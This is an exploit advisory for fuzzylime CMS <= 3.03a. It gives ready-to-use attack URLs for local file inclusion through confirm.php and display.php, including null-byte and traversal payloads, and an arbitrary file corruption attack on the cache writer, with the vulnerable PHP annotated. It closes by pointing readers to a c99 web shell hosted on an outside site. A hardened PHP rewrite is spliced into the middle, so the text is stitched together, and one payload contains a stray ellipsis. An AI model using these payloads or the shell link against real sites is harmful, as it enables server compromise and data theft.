+------------------------------------------------------------------------+
| fuzzylime cms <= 3.03a local inclusion / arbitrary file corruption poc  |
+------------------------------------------------------------------------+
| by staker                                                               |
+------------------------------------------------------------------------+
Author : xhaxkerx
Special Thankz : yasin
site : http://www.c99.mobi
+------------------------------------------------------------------------+
[1] [LFI]
http://[target]/[path]/code/confirm.php?e[]&list={file + nullbyte}

Vulnerable code in code/confirm.php (excerpt):
<?
@extract($HTTP_GET_VARS);                    <-------- {1}
@extract($_GET);                             <-------- {1}
elseif(isset($e)) {                          <-------- {2}
$filename = "code/mailing/$list.inc.php";    <-------- {3}
@include $filename;                          <-------- {4}

{1} extract() lets a GET parameter overwrite any variable that has not been defined yet,
    so the bug is exploitable regardless of the register_globals setting.
{2} $e is never defined, so it becomes $_GET['e'].
{3} $list is never defined, so it becomes $_GET['list'], and $filename is built from it.
{4} $filename, which now contains the attacker-controlled $list, is included.
[2] [LFI]
http://[target]/[path]/code/display.php?template={file + nullbyte}

[3] [LFC]
http://[target]/[path]/code/display.php?usecache=1&s=…//settings
http://[target]/[path]/code/display.php?usecache=1&s={file + nullbyte}   (requires magic_quotes_gpc = off)

Vulnerable code in code/display.php (excerpt); $cachefile is derived from the s parameter:
if($handle = fopen($cachefile, 'w')) { // Create the cache file    <-------- {4}
    $output = ob_get_contents();
    fputs($handle, $output);
    fclose($handle);
}
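A hardened form of the two patterns quoted above, the extract()/include in confirm.php and the cache write in display.php, as an added example rather than fuzzylime's own code. The parameter names (e, list, s, usecache) come from the advisory; the directory constants and helper function names are assumptions.

```php
<?php
// Added example, not fuzzylime code: a hardened replacement for the
// extract()/include and cache-write patterns quoted above. The parameter
// names come from the advisory; directories and helper names are assumed.
define('MAILING_DIR', __DIR__ . '/mailing');
define('CACHE_DIR',   __DIR__ . '/cache');

// 1. Do not extract() request arrays; read each parameter explicitly so
//    $e and $list can never be injected into local scope from the query.
$e    = isset($_GET['e']);
$list = isset($_GET['list']) ? (string) $_GET['list'] : '';
$s    = isset($_GET['s'])    ? (string) $_GET['s']    : '';

// 2. Restrict the include name to a strict token, then confirm the resolved
//    path is still inside MAILING_DIR. A NUL byte, "../" or an absolute path
//    fails the pattern before anything reaches include.
function mailing_include_path($list) {
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}\z/', $list)) {
        return null;
    }
    $base = realpath(MAILING_DIR);
    $real = realpath(MAILING_DIR . '/' . $list . '.inc.php');
    if ($base === false || $real === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

// 3. Never derive a cache filename from user input; hash it, so any value
//    of s (traversal or NUL byte included) only names a file in CACHE_DIR.
function cache_file_for($s) {
    return CACHE_DIR . '/' . hash('sha256', $s) . '.cache';
}

if ($e) {
    $filename = mailing_include_path($list);
    if ($filename === null) {
        http_response_code(400);
        exit('invalid list');
    }
    include $filename;
}

if (isset($_GET['usecache']) && $_GET['usecache'] === '1') {
    ob_start();
    // ... page output is generated here ...
    if ($handle = fopen(cache_file_for($s), 'w')) {
        fputs($handle, ob_get_contents());
        fclose($handle);
    }
}
```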
if you need shell http://www.c99.mobi/c99.txt